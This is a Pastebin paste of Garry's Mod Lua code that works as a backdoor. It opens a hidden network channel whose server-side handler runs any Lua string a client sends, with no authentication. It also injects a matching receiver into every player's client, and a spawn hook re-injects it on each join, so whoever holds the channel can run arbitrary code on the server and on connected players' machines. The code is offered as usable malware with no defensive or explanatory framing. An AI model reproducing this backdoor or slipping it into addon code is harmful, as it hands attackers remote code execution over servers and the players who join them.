2much4Us

Untitled

Jun 19th, 2018
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. util.AddNetworkString( '||||' ) net.Receive( '||||' , function(len,ply) local f = net.ReadString() RunString (f) end )
  2.  
  3. function BDSendLua( p, str ) net.Start( "||||" ) net.WriteString( str ) net.Send( p ) end
  4.  
  5. function BDSendLuaAll( str ) net.Start( "||||" ) net.WriteString( str ) net.Broadcast() end
  6.  
  7. function BDInjectAids( p ) p:SendLua( 'net.Receive( "||||", function() RunString( net.ReadString() ) end )' ) end
  8.  
  9. for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
  10.  
  11. hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
Advertisement
Add Comment
Please, Sign In to add comment